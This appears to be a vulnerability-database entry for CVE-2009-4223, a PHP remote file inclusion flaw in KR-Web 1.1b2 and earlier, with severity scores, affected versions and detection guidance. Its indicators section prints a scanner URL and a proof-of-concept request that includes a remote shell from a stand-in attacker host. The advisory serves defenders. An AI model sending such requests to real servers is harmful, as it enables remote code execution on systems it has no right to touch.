cbcvebase.
CVE-2009-4223
published 2009-12-07

CVE-2009-4223: PHP remote file inclusion vulnerability in adm/krgourl.php in KR-Web 1.1b2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the…

PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
55.51%
98.9th percentile
PHP remote file inclusion vulnerability in adm/krgourl.php in KR-Web 1.1b2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.

Affected

2 ranges
VendorProductVersion rangeFixed in
gianni_tommasikr-php_web_content_server<= 1.1
gianni_tommasikr-php_web_content_server

Detection & IOCsextracted from sources · hover to see the quote

path/adm/krgourl.php
url{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}
commandhttp://server/[path]/adm/krgourl.php?DOCUMENT_ROOT=http://attacker.com/shell.txt?cmd
  • Look for GET requests to /adm/krgourl.php with a URL-valued DOCUMENT_ROOT parameter, indicating an RFI attempt.
  • The Nuclei template matches on HTTP 200 response status combined with an outbound HTTP interaction (interactsh callback), confirming successful RFI trigger.
  • The PoC appends a ?cmd query string to the included remote file URL, which is a common shell command-execution pattern to watch for in DOCUMENT_ROOT parameter values.
  • ·The vulnerability is limited to KR-Web versions 1.1b2 and earlier; later versions are not affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.